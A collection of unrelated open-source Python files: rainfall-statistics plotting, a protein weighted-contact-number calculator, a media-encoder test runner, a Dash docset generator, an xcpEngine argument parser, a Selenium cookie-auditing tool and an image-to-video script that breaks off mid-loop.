highRvar_dur_cdf = norm.cdf(highRvar_durations, np.average(highRvar_durations), np.std(highRvar_durations))
lowRvar_depth_cdf = norm.cdf(lowRvar_depth, np.average(lowRvar_depth), np.std(lowRvar_depth))
highRvar_depth_cdf = norm.cdf(highRvar_depth, np.average(highRvar_depth), np.std(highRvar_depth))
lowRvar_int_cdf = norm.cdf(lowRvar_intensities, np.average(lowRvar_intensities), np.std(lowRvar_intensities))
highRvar_int_cdf = norm.cdf(highRvar_intensities, np.average(highRvar_intensities), np.std(highRvar_intensities))
plt.figure("Panel A")
int_bins = np.arange(0, 5, 0.1)
ax = plt.gca()
plt.title('Comparison sampled high/low $R_{var}$ intensity probabilities')
plt.hist(highRvar_intensities, int_bins, color='saddlebrown', label='Sampled high $R_{var}$ Data', weights =highRvar_weights, histtype='step',linewidth=1.5)#alpha=0.4)# histtype='step')
plt.hist(lowRvar_intensities, int_bins, color='teal', label='Sampled low $R_{var}$ Data', histtype='step',weights=lowRvar_weights,linewidth=1.5)
plt.legend()
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
plt.xlabel('Intensity (mm/hr)')
plt.ylabel('Probability')
plt.ylim(0, 0.3)
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
ax.set_xticks(np.arange(0, 5, 1))
plt.xlim(0, 4)
plt.show()
inds_i = highRvar_intensities.argsort()
inds_bi = lowRvar_intensities.argsort()
plt.figure("Panel B")
ax = plt.gca()
plt.loglog(np.sort(highRvar_intensities),norm.pdf(highRvar_intensities, scale=np.average(highRvar_intensities))[inds_i],'-' ,label='Sampled high R$_{var}$', color='saddlebrown')
plt.loglog(np.sort(lowRvar_intensities), norm.pdf(lowRvar_intensities, scale=np.average(lowRvar_intensities))[inds_bi], label='Sampled low R$_{var}$', color='teal')
plt.legend()
plt.ylim(10**-3, 10**-0)
plt.xlim(5*(10**-1), 10**1)
plt.xlabel('Rainfall intensity for an event (mm hr$^{-1}$)')
plt.ylabel('Relative frequency')
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
plt.show()
depth_bins = np.arange(0, 100, 2)
plt.figure("Panel C")
ax = plt.gca()
plt.title('Comparison sampled high/low $R_{var}$ depth probabilities')
plt.hist(highRvar_depth, depth_bins, color='saddlebrown', label='Sampled high $R_{var}$ Data',weights=dhighRvar_weights, histtype='step', linewidth=1.5)# alpha=0.4)
plt.hist(lowRvar_depth, depth_bins, color='teal', label='Sampled low $R_{var}$ Data', weights=dlowRvar_weights, histtype='step', linewidth=1.5)
plt.legend()
plt.xlabel('Depth (mm)')
plt.ylabel('Probability')
plt.ylim(0, 0.3)
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
ax.set_xticks(np.arange(0, 90, 15))
plt.xlim(0, 60)
plt.show()
inds = highRvar_depth.argsort()
inds_b = lowRvar_depth.argsort()
plt.figure("Panel D")
ax = plt.gca()
plt.loglog(np.sort(highRvar_depth),norm.pdf(highRvar_depth, scale=np.average(highRvar_depth))[inds],'-' ,label='Sampled high R$_{var}$', color='saddlebrown')
plt.loglog(np.sort(lowRvar_depth), norm.pdf(lowRvar_depth, scale=np.average(lowRvar_depth))[inds_b], label='Sampled low R$_{var}$', color='teal')
plt.legend()
plt.ylim(10**-6, 10**-1)
plt.xlim(10**0, 10**2)
ax.tick_params(direction='in',bottom='on', top='on', right='on', left='on')
plt.xlabel('Rainfall depth for an event (mm)')
plt.ylabel('Relative frequency')
plt.show()
| StarcoderdataPython |
11288806 | #!/usr/bin/python
'''
This script parses an input PDB file and returns weighted contact number (WCN)
values, calculated with respect to the alpha-carbon (wcn_ca) and the sidechain
geometric center (wcn_sc).
Author: <NAME>
'''
import os
import csv
import warnings
import argparse
import textwrap
from Bio.Data import SCOPData
from Bio.PDB import PDBParser
from Bio.PDB import is_aa
def inv_sq_distance(coord1, coord2):
'''
Returns the inverse squared distance between any two coordinates.
'''
distance = 0.0
for i, j in zip(coord1, coord2):
distance += (i-j)**2
return 1/distance
def calculate_wcn(residues):
'''
Calculates weighted contact number (WCN).
'''
for residue in residues:
wcn_ca = 0
wcn_sc = 0
for other_residue in residues:
if residue != other_residue:
wcn_ca += inv_sq_distance(residue['coord_ca'],
other_residue['coord_ca'])
wcn_sc += inv_sq_distance(residue['sidechain_center'],
other_residue['sidechain_center'])
residue['wcn_ca'] = wcn_ca
residue['wcn_sc'] = wcn_sc
return residues
def process_residue(residue):
'''
Processes a single residue to determine the coordinates of the alpha-carbon
and the sidechain center-of-mass. Also checks for missing atoms in a
residue.
'''
output_dict = {}
atoms_seen = []
# Convert three letter amino acid to one letter
output_dict['pdb_aa'] = SCOPData.protein_letters_3to1[residue.resname]
# Grab residue number AND any insertion site labeling (11A, 11B, etc.)
output_dict['pdb_position'] = str(residue.get_id()[1]) + \
residue.get_id()[2].strip()
output_dict['chain'] = residue.get_full_id()[2]
# Coordinates of all sidechain atoms in this residue
sidechain_coords = []
for atom in residue:
atoms_seen.append(atom.name)
if atom.name == 'CA':
# Save alpha-carbon coordinates
output_dict['coord_ca'] = atom.get_coord()
if atom.name not in ['C', 'CA', 'O', 'N']:
# Must be a sidechain atom...
sidechain_coords.append(atom.get_coord())
warning_message = "Missing {} in residue (" + \
str(output_dict['pdb_position']) + ", " + \
str(output_dict['pdb_aa']) + ")"
for mainchain_atom in ['N', 'C', 'O']:
# Warn about any missing mainchain atoms
if mainchain_atom not in atoms_seen:
warnings.warn(warning_message.format(mainchain_atom),
RuntimeWarning)
if 'coord_ca' not in output_dict:
# Cannot calculate WCN without at least alpha-carbon
raise RuntimeError(warning_message.format('CA') +
'. Cannot calculate C-alpha WCN.')
if len(sidechain_coords) == 0:
# Warn about missing sidechain for amino acids other than glycine
if output_dict['pdb_aa'] != 'G':
warnings.warn(warning_message.format('sidechain') +
'. Using CA instead.', RuntimeWarning)
sidechain_coords.append(output_dict['coord_ca'])
# Calculate side chain center of mass
output_dict['sidechain_center'] = sum(sidechain_coords)/\
len(sidechain_coords)
return output_dict
def collect_coordinates(structure):
'''
Loops over all residues in a structure and collects coordinates for alpha-
carbons and sidechain center-of-mass. Returns a list of dictionaries, where
each dictionary corresponds to residue in the structure.
'''
output_list = []
for residue in structure.get_residues():
if is_aa(residue):
output_list.append(process_residue(residue))
return output_list
def main():
'''
Parse an input PDB file and return a CSV with weighted contact number
values.
'''
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='Calculate WCN values for an input PDB.',
epilog=textwrap.dedent('''\
This script produces a CSV with the following columns:
Column name Description
===================================================================
pdb_position Residue number, extracted from the input PDB file.
chain PDB chain.
pdb_aa Single-letter amino acid.
wcn_sc Weighted contact number calculated with respect to
the amino acid side-chain center-of-mass.
wcn_ca Weighted contact number calculated with respect to the
amino acid alpha carbon.
''') )
parser.add_argument('pdb', metavar='<PDB path>', type=str,
help='input pdb file')
parser.add_argument('-o', metavar='<output prefix>', type=str,
help='prefix for output files')
args = parser.parse_args()
pdb_name = os.path.splitext(os.path.basename(args.pdb))[0]
# Define output file names
if args.o is None:
# If no output prefix given, assign prefix using input filename
args.o = pdb_name
output_wcn = args.o + '.wcn.csv'
# Load in PDB with BioPython
pdb_parser = PDBParser()
structure = pdb_parser.get_structure(pdb_name.upper(), args.pdb)
# Collect coordinate information
output_list = collect_coordinates(structure)
# Calculate WCN from coordinates
output_list = calculate_wcn(output_list)
# Write output to a CSV
with open(output_wcn, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=['pdb_position', 'chain',
'pdb_aa', 'wcn_sc', 'wcn_ca'],
extrasaction="ignore")
writer.writeheader()
writer.writerows(output_list)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3428870 | <filename>ted/ted/run.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018 Intel Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import json
import pprint
import pathlib
import hashlib
import subprocess
class EncodedFileName(object):
def __init__(self, case_id):
self.case_id = case_id
self.idx = 1
self.names = []
def __call__(self, m):
filename = '{:04d}.{:02d}.out'.format(self.case_id, self.idx)
self.names.append(filename)
self.idx += 1
return filename
def collect_md5(names, workdir, case_id):
results = {}
md5 = hashlib.md5()
for name in names:
with (workdir / name).open("rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
md5.update(chunk)
results[name] = md5.hexdigest()
result = workdir / "{:04d}.json".format(case_id)
with result.open('w') as f:
json.dump(results, f)
return results
class Runner(object):
def __init__(self, extra_env, cfg):
self.env = os.environ.copy()
if extra_env:
self.env.update(extra_env)
self.extra_env = extra_env
self.cfg = cfg
def _run(self, case_id, cmd, workdir, log):
log.dump_header()
log.separator()
for var, val in self.extra_env.items():
log.log("export {}={}".format(var, val))
log.log("cd {}".format(workdir.resolve()))
# ensure all parts of command line are strings
cmd = [str(e) for e in cmd]
log.log(subprocess.list2cmdline(cmd))
log.separator()
try:
p = subprocess.run(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=True,
cwd=str(workdir),
env=self.env,
#shell=True
)
log.log(p.stdout.decode('utf-8'))
log.separator()
return p.returncode
except subprocess.CalledProcessError as exc:
log.log(exc.output.decode('utf-8'))
log.separator()
log.log("return code: {}".format(exc.returncode))
return exc.returncode
def other_options(self, case):
cmd = []
# process remaining arguments
for k, v in case.items():
if isinstance(v, bool):
if v:
cmd.append("-{}".format(k))
else:
cmd.extend(["-{}".format(k), v])
return cmd
def sample_decode(self, case_id, case, workdir, log):
cmd = ['sample_decode']
cmd.append('-hw')
stream = case.pop("stream")
cmd.append(stream.codec)
cmd.extend(['-i', str(stream.path.absolute())]) #TODO: use absolute here 'higher'?
decoded = "{:04d}.yuv".format(case_id)
cmd.extend(['-o', decoded])
cmd.extend(self.other_options(case))
returncode = self._run(case_id, cmd, workdir, log)
results = {}
if returncode == 0:
results = collect_md5([decoded], workdir, case_id)
log.log(pprint.pformat(results))
return results
def sample_encode(self, case_id, case, workdir, log):
cmd = ['sample_encode']
encoder = case.pop('codec')
cmd.append(encoder.codec)
if encoder.plugin:
cmd.extend(['-p', encoder.plugin['guid']])
cmd.append('-hw')
stream = case.pop('stream')
cmd.extend(['-i', stream.path.absolute()])
cmd.extend(['-w', stream.width])
cmd.extend(['-h', stream.height])
if 'target_usage' in case:
tu = case.pop('target_usage')
cmd.extend(['-u', tu.usage])
if 'quality' in case:
quality = case.pop('quality')
cmd.extend(['-q', quality])
if 'bitrate' in case:
bitrate = case.pop('bitrate')
cmd.extend(['-b', bitrate])
if 'qp' in case:
qp = case.pop('qp')
cmd.extend(['-cqp', '-qpi', qp, '-qpp', qp, '-qpb', qp])
cmd.extend(self.other_options(case))
encoded = "{:04d}.{}".format(case_id, encoder.codec)
cmd.extend(['-o', encoded])
returncode = self._run(case_id, cmd, workdir, log)
results = {}
if returncode == 0:
results = collect_md5([encoded], workdir, case_id)
log.log(pprint.pformat(results))
return results
def sample_multi_transcode(self, case_id, case, workdir, log):
cmd = ['sample_multi_transcode']
parfile = case.pop('parfile')
encoded_fn = EncodedFileName(case_id)
text = re.sub(r'\{out\}', encoded_fn, parfile.text)
parfile = workdir / '{:04d}.par'.format(case_id)
parfile.write_text(text)
cmd.extend(['-par', parfile.name])
returncode = self._run(case_id, cmd, workdir, log)
results = {}
if returncode == 0:
results = collect_md5(encoded_fn.names, workdir, case_id)
log.log(pprint.pformat(results))
return results
def sample_vpp(self, case_id, case, workdir, log):
cmd = ['sample_vpp']
cmd.extend(['-lib', 'hw'])
stream = case.pop('stream')
cmd.extend(['-i', stream.path.absolute()])
cmd.extend(['-sw', stream.width])
cmd.extend(['-sh', stream.height])
cmd.extend(self.other_options(case))
processed = "{:04d}.vpp".format(case_id)
cmd.extend(['-o', processed])
returncode = self._run(case_id, cmd, workdir, log)
results = {}
if returncode == 0:
results = collect_md5([processed], workdir, case_id)
log.log(pprint.pformat(results))
return results
| StarcoderdataPython |
5176517 | <reponame>cblair/docset_from_html
#!/usr/bin/env python3
import os
import sys
import shutil
from get_plist_text import get_plist_text
import sqlite3
import re
import lxml
import json
from pyquery import PyQuery as pq
class docset_from_html:
def __init__(self, docset_name, html_src_dir, config_filename):
self.docset_name = docset_name
self.html_src_dir = html_src_dir
self.config_file = open(config_filename, 'r')
self.config_selections = json.loads(self.config_file.read())
def __del__(self):
self.config_file.close()
def __make_docset_folder(self):
os.makedirs(os.path.join(self.docset_name + '.docset', 'Contents',
'Resources'))
def __create_info_plist_file(self):
with open(os.path.join(self.docset_name + '.docset', 'Contents',
'Info.plist'), 'w') as fp:
fp.write(get_plist_text(cf_bundler_identifier=self.docset_name,
cf_bundle_name=self.docset_name,
docset_platform_family=None))
def __create_sqlite_index(self):
self.conn = sqlite3.connect(
os.path.join(self.docset_name +
'.docset','Contents','Resources','docSet.dsidx'))
self.db_cursor = self.conn.cursor()
self.db_cursor.execute('CREATE TABLE searchIndex ' +
'(id INTEGER PRIMARY KEY, name TEXT, type TEXT, path TEXT);')
self.db_cursor.execute('CREATE UNIQUE INDEX anchor ON searchIndex' +
'(name, type, path);')
# TODO - refactor, split out into more separate methods
def __population_sqlite_index(self, html_dst_dir):
fileregex = re.compile('^.*\.html')
# For every file in the destination directory...
for dirpath, dnames, fnames in os.walk(html_dst_dir):
for fname in fnames:
# If the file is not an html file, go to the next one.
if not fileregex.match(fname):
continue
# Open the file and process it
fq_fname = os.path.join(dirpath, fname)
with open(fq_fname) as fp:
try:
filetext = fp.read()
except:
filetext = ""
# Get a DOM object from the text.
try:
dom = pq(filetext)
print("Processing " + fq_fname)
except ValueError as e:
print("WARN: ignoring {fname}, error: {error}".format(
fname=fq_fname, error=e))
continue
except lxml.etree.XMLSyntaxError as e:
print("WARN: ignoring {fname}, error: {error}".format(
fname=fq_fname, error=e))
continue
# Collect all the elements in the DOM we care about based
# on the selection configuration, and craft our search index
# data from it.
search_index_data = []
for key in self.config_selections.keys():
config_selection = self.config_selections[key]
# Get all the elements that match in the DOM.
elements = dom(key)
for element in elements:
# The optional reference to the page section, using
# the HTML name attribute.
section_reference = ""
# TODO: check that its an <a> element too.
# TODO: support HTML 5 id attribute
if 'name' in element.attrib.keys():
section_reference = "#" + element.attrib['name']
# Set the search text to the element's text, or
# what the config wants it set to.
element_text = element.text
if 'text_sub_element' in config_selection.keys():
sub_element = element.find(
config_selection['text_sub_element'])
element_text = sub_element.text if \
sub_element != None else ""
search_index_data.append(
[
# name
element_text,
# type
config_selection['entry_type'],
#path
# TODO: need to add # name reference so
# clicking on the index will go to the
# page section (if html name attr is
# set). User element.attrib.
os.path.join(dirpath, fname).replace(
html_dst_dir + os.sep, ''
) + section_reference
]
)
self.db_cursor.executemany(
'INSERT OR IGNORE INTO searchIndex' +
'(name, type, path) VALUES (?,?,?)',
search_index_data)
self.conn.commit()
def run(self):
html_dst_dir = os.path.join(
self.docset_name + '.docset', 'Contents', 'Resources', 'Documents')
# 1. Create the Docset Folder
self.__make_docset_folder()
# 2. Copy the HTML Documents
shutil.copytree(self.html_src_dir, html_dst_dir)
# 3. Create the Info.plist File
self.__create_info_plist_file()
# 4. Create the SQLite Index
self.__create_sqlite_index()
# 5. Populate the SQLite Index
self.__population_sqlite_index(html_dst_dir)
# 6. Table of Contents Support (optional)
# TODO
# Cleanup
self.conn.close()
if __name__ == "__main__":
# Simple cheesy options handling.
if len(sys.argv) != 4:
print(
'Usage: docset_from_html.py <docset name> ' +
'<source html directory> <selection config file>')
sys.exit(1)
dfh = docset_from_html(sys.argv[1], sys.argv[2], sys.argv[3])
dfh.run()
| StarcoderdataPython |
11328567 | <reponame>dhasegan/xcpEngine
import os
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
def get_parser():
"""Defines the command line interface of the wrapper"""
parser = ArgumentParser(
description='xcpEngine: the extensible connectome pipeline',
formatter_class=RawTextHelpFormatter,
prog="xcpEngine",
add_help=False
)
# Standard xcpEngine arguments
mandatory_group = parser.add_argument_group('Mandatory options')
mandatory_group.add_argument(
'-d',
type=os.path.abspath,
required=True,
action='store',
help="Primary design file for pipeline: "
"The design file specifies the pipeline modules to "
"be included in the current analysis and configures "
"any parameters necessary to run the modules.")
mandatory_group.add_argument(
'-c',
required=True,
action='store',
help="Cohort file for pipeline input: "
"A comma-separated catalogue of the analytic sample. "
"Each row corresponds to a subject, and each column "
"corresponds either to an identifier or to an input.")
mandatory_group.add_argument(
'-o',
required=True,
action='store',
help="Parent directory for pipeline output: "
"A valid path on the current filesystem specifying "
"the directory wherein all output from the current "
"analysis will be written.")
optional_group = parser.add_argument_group('Optional Arguments')
optional_group.add_argument(
'-m',
choices=["s", "c"],
action='store',
help="Execution mode: "
"Input can either be 's' (for serial execution on a "
"single machine)[default], 'c' (for execution on a "
"computing cluster) or a path to a file (for execution "
"on a computing cluster, subject to the specifications "
"defined in the file).")
optional_group.add_argument(
'-i',
action='store',
help=": Scratch space for pipeline intermediates: "
"Some systems operate more quickly when temporary "
"files are written in a dedicated scratch space. This "
"argument enables a scratch space for intermediates.")
optional_group.add_argument(
'-r',
action='store',
help="Root directory for inputs: "
"If all paths defined in the cohort file are defined "
"relative to a root directory, then this argument will "
"define the root directory. Otherwise, all paths will "
"be treated as absolute.")
optional_group.add_argument(
'-t',
action='store',
choices=["0", "1", "2", "3"],
help="Integer value ( 0 - 3 ) that indicates the level "
"of verbosity during module execution. Higher "
"levels reduce readability but provide useful "
"information for troubleshooting.")
optional_group.add_argument(
"--help",
action="store_true"
)
return parser
| StarcoderdataPython |
6560583 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""This module uses selenium automation to visit a list of sites loaded
from configuration and either accept or reject cookies retrieving the
cookies created during the visit and creating statistics around them.
It also screenshots the site and some of its important elements
regarding cookies."""
import csv
import logging
import os
import platform
import sqlite3
import sys
from collections import Counter
from shutil import rmtree
from time import sleep
from urllib.parse import urlparse
import arrow
import yaml
from selenium.common.exceptions import (ElementClickInterceptedException,
NoSuchElementException,
TimeoutException)
from selenium.webdriver import Chrome, ChromeOptions
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# from PIL import Image
CWD = os.path.dirname(__file__)
DATA_PATH = os.path.join(CWD, "data")
CONFIG_PATH = os.path.join(CWD, "config")
PROFILE_PATH = os.path.abspath(os.path.join(CWD, "profile"))
HEADER_COOKIES = [
"host_key",
"name",
"value",
"path",
"expires_utc",
"is_secure",
"is_httponly",
"has_expires",
"is_persistent",
"priority",
"samesite",
"source_scheme",
]
HEADER_STATS = [
"url",
"total",
"session",
"max_exp_days",
"avg_exp_days",
"secure_flag",
"httponly_flag",
"samesite_none_flag",
"samesite_lax_flag",
"samesite_strict_flag",
]
LOG = logging.getLogger()
def _set_logging():
"""
Setup logging based on envvars and opinated defaults
"""
log_level = os.getenv("TRIKI_LOG_LEVEL", "INFO")
quiet = os.getenv("TRIKI_NO_LOG_FILE")
handlers = [logging.StreamHandler()]
if not quiet:
handlers.append(logging.FileHandler("triki.log"))
logging.basicConfig(
level=log_level,
format="%(asctime)-15s %(levelname)s: %(message)s",
handlers=handlers,
)
def _config():
"""
read sites configuration and accept and reject flows for cookie extraction
"""
config = None
try:
with open("%s/sites.yaml" % CONFIG_PATH, "r", encoding="utf8") as f:
config = yaml.load(f, Loader=yaml.FullLoader)
except Exception as e:
LOG.error("Could not load triki configuration: %s", e)
raise e
return config
def _get_duration_in_days(expires_utc):
"""
via: https://stackoverflow.com/questions/43518199/cookies-expiration-time-format
and https://stackoverflow.com/questions/51343828/how-to-parse-chrome-bookmarks-date-added-value-to-a-date
"""
now = arrow.utcnow()
epoch_start = arrow.get(1601, 1, 1)
expiration_date = epoch_start.shift(microseconds=int(expires_utc))
days = (expiration_date - now).days
return days
def _sqlite_dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def get_cookies():
"""
Access google chrome profile cookies sqlite databasex
"""
results = []
db = os.path.join(PROFILE_PATH, "Default", "Cookies")
try:
conn = sqlite3.connect(db)
conn.row_factory = _sqlite_dict_factory
cursor = conn.cursor()
cursor.execute("SELECT * FROM cookies order by host_key, expires_utc desc")
results = cursor.fetchall()
LOG.info("Encontradas %s cookies", len(results))
except Exception as e:
LOG.error("get_cookies: %s", e)
raise e
return results
def export_cookies(cookies, path):
"""
Export cookies pickling them to file
"""
try:
with open(path, "w") as f:
writer = csv.DictWriter(
f, fieldnames=HEADER_COOKIES, extrasaction="ignore", restval=0
)
writer.writeheader()
writer.writerows(cookies)
except Exception as e:
LOG.error(e)
raise e
def export_stats(stats, path):
"""
Export cookies pickling them to file
"""
try:
with open(path, "w") as f:
writer = csv.DictWriter(
f, fieldnames=HEADER_STATS, extrasaction="ignore", restval=0
)
writer.writeheader()
writer.writerow(stats)
except Exception as e:
LOG.error(e)
raise e
def cookie_stats(cookies, url):
"""
Compute cookie statistics
"""
stats = {"url": url}
LOG.debug("We have found %s cookies for %s", len(cookies), url)
stats["total"] = len(cookies)
session_cookies = [cookie for cookie in cookies if not int(cookie["is_persistent"])]
LOG.debug("There are %s session cookies", len(session_cookies))
stats["session"] = len(session_cookies)
# Compute expiration maximum and average in days
delta_expiration_days = [
_get_duration_in_days(cookie["expires_utc"])
for cookie in cookies
if int(cookie["is_persistent"])
]
if delta_expiration_days:
stats["max_exp_days"] = max(delta_expiration_days)
LOG.debug("max expiration in days is %s", max(delta_expiration_days))
stats["avg_exp_days"] = int(
round(sum(delta_expiration_days) / len(delta_expiration_days))
)
LOG.debug("average expiration in days: %s", stats["avg_exp_days"])
else:
stats["max_exp_days"] = 0
stats["avg_exp_days"] = 0
# Get secure and httponly stats
secure = 0
http_only = 0
for cookie in cookies:
if int(cookie["is_secure"]):
secure += 1
if int(cookie["is_httponly"]):
http_only += 1
stats["secure_flag"] = secure
LOG.debug("There are %s secure cookies", stats["secure_flag"])
stats["httponly_flag"] = http_only
LOG.debug("There are %s httpOnly cookies", stats["httponly_flag"])
# SameSite
same_site = Counter([str(cookie["samesite"]) for cookie in cookies])
LOG.debug("same_site %s", same_site)
stats["samesite_none_flag"] = same_site["-1"]
stats["samesite_lax_flag"] = same_site["0"]
stats["samesite_strict_flag"] = same_site["1"]
LOG.debug(
"There are %s cookies with SameSite set to None", stats["samesite_none_flag"]
)
LOG.debug(
"There are %s cookies with SameSite set to Lax", stats["samesite_lax_flag"]
)
LOG.debug(
"There are %s cookies with SameSite set to Strict",
stats["samesite_strict_flag"]
)
return stats
def _locate_element(driver, el):
"""
locate an element inside the page using selenium capabilities
"""
element = None
# Check if we expect multiple elements to be selected
multiple = False
match = None
try:
multiple = el["multiple"]
match = el["match"].strip().lower()
except KeyError:
pass
try:
if multiple:
selection = driver.find_elements(el["by"], el["value"])
LOG.debug("found %s", len(selection))
# found multiple use match to refine
if selection and len(selection) >= 1:
for selected in selection:
if match in selected.text.lower():
element = selected
break
else:
element = driver.find_element(el["by"], el["value"])
except Exception as e:
LOG.error("Could not locate the element in the page: %s", el)
raise e
return element
def screenshot(driver, el, filepath, filename=None):
"""
takes a screenshot of an element or the whole site
"""
if not el:
el = {"by": "tag name", "value": "body"}
if not filename:
filename = el["value"].replace(".", "_")
element = _locate_element(driver, el)
element.screenshot("%s/banner_cookies_%s.png" % (filepath, filename))
def navigate_frame(driver, el):
"""
navigate to iframe by index using selenium capabilities
"""
if "index" in el:
driver.switch_to.frame(el["index"])
else:
element = _locate_element(driver, el)
driver.switch_to.frame(element)
def click(driver, el):
"""
clicks on an element using selenium capabilities
"""
element = _locate_element(driver, el)
LOG.debug("element: %s", element)
if "javascript" in el:
driver.execute_script("arguments[0].scrollIntoView(true);",element)
driver.execute_script("arguments[0].click();", element)
else:
try:
element.click()
except ElementClickInterceptedException as e:
LOG.debug("try click through javascript after exception")
driver.execute_script("arguments[0].scrollIntoView(true);",element)
driver.execute_script("arguments[0].click();", element)
def delay(driver, el, value):
"""
Wait for something to happen in the site
"""
TRIKI_AVAILABLE_CONDITIONS = {
"element_to_be_clickable": EC.element_to_be_clickable,
"presence_of_element_located": EC.presence_of_element_located,
"visibility_of_element_located": EC.visibility_of_element_located,
}
if el:
if "condition" in el:
expected_condition_method = TRIKI_AVAILABLE_CONDITIONS[el["condition"]]
else:
expected_condition_method = EC.element_to_be_clickable
try:
WebDriverWait(driver, value).until(
expected_condition_method((el["by"], el["value"]))
)
except TimeoutException as e:
LOG.info("Timeout for explicit wait on %s", el)
raise e
else:
driver.implicitly_wait(value)
def keys(driver, el, value):
"""
Wait for something to happen in the site
"""
element = _locate_element(driver, el)
element.clear()
element.send_keys(value)
def submit(driver, el):
"""
clicks on an element using selenium capabilities
"""
element = _locate_element(driver, el)
element.submit()
def execute_cookies_flow(site, site_path, hostname):
"""
Navigates to a site and depending on the selected flow
accepts or rejects all the cookies and stores results, screenshots
and statistics on the cookies for the site
"""
TRIKI_AVAILABLE_ACTIONS = {
"screenshot": screenshot,
"navigate_frame": navigate_frame,
"click": click,
"delay": delay,
"sleep": sleep,
"keys": keys,
"submit": submit,
}
# Clear profile to start fresh always
if os.path.exists(PROFILE_PATH):
rmtree(PROFILE_PATH)
os.makedirs(PROFILE_PATH)
# Selenium Chrome initialization with a intended profile
opts = ChromeOptions()
# Seems that it does not create the Cookies sqlite db
# opts.add_argument("--headless")
opts.add_argument("user-data-dir=%s" % PROFILE_PATH)
prefs = {}
# Force browser language
if "language" in site:
prefs["intl.accept_languages"] = site["language"]
else:
# Defaults to spanish
prefs["intl.accept_languages"] = "es, es-ES"
# Try to block cookies
# 1: allow, 2: block
# via: https://stackoverflow.com/questions/32381946/disabling-cookies-in-webdriver-for-chrome-firefox/32416545
if "block_all_cookies" in site:
prefs["profile.default_content_setting_values.cookies"] = 2
site["flow_type"] += "_block_all"
# Try to block third party cookies
# Force browser language
if "block_third_party_cookies" in site:
prefs["profile.block_third_party_cookies"] = True
site["flow_type"] += "_block_third_party"
if "enable_do_not_track" in site:
prefs["enable_do_not_track"] = True
site["flow_type"] += "_do_not_track"
opts.add_experimental_option("prefs", prefs)
# Fix window size to be consistent across
opts.add_argument("window-size=1920,1080")
opts.add_argument("--log-level=3")
driver = Chrome(options=opts)
try:
LOG.info("Analysing %s %sing all cookies", site["url"], site["flow_type"])
driver.get(site["url"])
if not os.path.exists(site_path):
os.makedirs(site_path)
for step in site["flow"]:
function = TRIKI_AVAILABLE_ACTIONS[step["action"]]
if step["action"] == "screenshot":
if "filename" not in step:
step["filename"] = None
function(driver, step["element"], site_path, step["filename"])
elif step["action"] == "navigate_frame":
function(driver, step["element"])
elif step["action"] == "click":
function(driver, step["element"])
elif step["action"] == "submit":
function(driver, step["element"])
elif step["action"] == "keys":
function(driver, step["element"], step["value"])
elif step["action"] == "delay":
function(driver, step["element"], step["value"])
elif step["action"] == "sleep":
function(step["value"])
LOG.info("done with step: %s", step)
except Exception as e:
LOG.error("Exception while processing flow %s", e)
raise
finally:
driver.close()
# Retrieve and compute stats over the site cookies
# Generate paths
cookies_path = "%s/cookies_%s_%s.csv" % (
site_path,
site["flow_type"],
hostname.replace(".", "_"),
)
stats_path = "%s/stats_%s_%s.csv" % (
site_path,
site["flow_type"],
hostname.replace(".", "_"),
)
# Retrieve cookies from sqlite
cookies = get_cookies()
LOG.debug(cookies)
# Export cookies to csv
export_cookies(cookies, cookies_path)
# Compute cookie stats
stats = cookie_stats(cookies, site["url"])
# Export cookie stats to csv
export_stats(stats, stats_path)
def run():
"""
Analyze cookies for a given site
"""
# Configure logging
_set_logging()
# Create output folders if needed
if not os.path.exists(DATA_PATH):
os.makedirs(DATA_PATH)
# Read sites configuration
config = _config()
for site in config["sites"]:
try:
LOG.debug(site)
today = arrow.utcnow().format("YYYYMMDD")
url = urlparse(site["url"])
site_path = os.path.join(DATA_PATH, url.hostname, today)
execute_cookies_flow(site, site_path, url.hostname)
except (KeyboardInterrupt, SystemExit):
sys.exit()
except Exception as e:
LOG.error("Found error while processing %s", site["url"])
# Delete last profile from selenium execution adding more time for windows
if platform.system() == "Windows":
sleep(20)
if os.path.exists(PROFILE_PATH):
rmtree(PROFILE_PATH)
if __name__ == "__main__":
run()
| StarcoderdataPython |
4831766 | <filename>realsense/img2video.py
import cv2
import argparse
import os
import numpy as np
from tqdm import tqdm
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--img-root', type=str, default='rs/JPEGImages')
parser.add_argument('--fps', type=int, default=30)
parser.add_argument('--size', default=(640, 480))
parser.add_argument('--video-name', default='video.avi')
args = parser.parse_args()
assert os.path.exists(args.img_root)
filelist = os.listdir(args.img_root)
video = cv2.VideoWriter(args.video_name, cv2.VideoWriter_fourcc('I', '4', '2', '0'), args.fps, args.size)
for item in tqdm(filelist):
if item.split('.')[-1].lower() in ['jpg', 'png', 'jpeg']:
path = os.path.join(args.img_root, item)
